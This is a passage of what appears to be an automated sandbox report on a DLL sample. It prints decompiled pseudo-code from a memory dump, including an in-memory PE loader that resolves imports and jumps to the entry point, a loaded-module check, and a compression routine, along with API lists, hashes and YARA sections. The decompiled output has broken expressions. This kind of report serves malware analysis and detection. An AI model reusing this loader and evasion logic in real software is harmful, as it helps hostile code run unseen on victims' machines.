						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

APIs

memcpy.MSVCRT ref: 10012E7D
memcpy.MSVCRT ref: 10012EF4
memcpy.MSVCRT ref: 10012F23
memcpy.MSVCRT ref: 10012F4F
memcpy.MSVCRT ref: 10013004

Part of subcall function 10015D90: memcpy.MSVCRT ref: 10015E6E

Part of subcall function 10014AF0: memcpy.MSVCRT ref: 10014B1A

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x15d0590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x15d0590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x15d0590
						_t22 = _t133 + 0x114; // 0x15d06a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x15d0590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x164fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x164fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x15d0590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x164faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x15d0590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x15d0590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x15d0590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x15d0590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x164faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x15d0590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x15d0590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x164faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x15d0590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x15d0590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x15d0590
								_t117 = _t331 + 0x228; // 0x15d07b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
lstrcpynW.KERNEL32(015D0158,00000105), ref: 1000526F
lstrcpynW.KERNEL32(015D0368,00000105), ref: 10005283

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C4C
LoadLibraryA.KERNEL32(?), ref: 10012C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x164faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x164faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x164faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
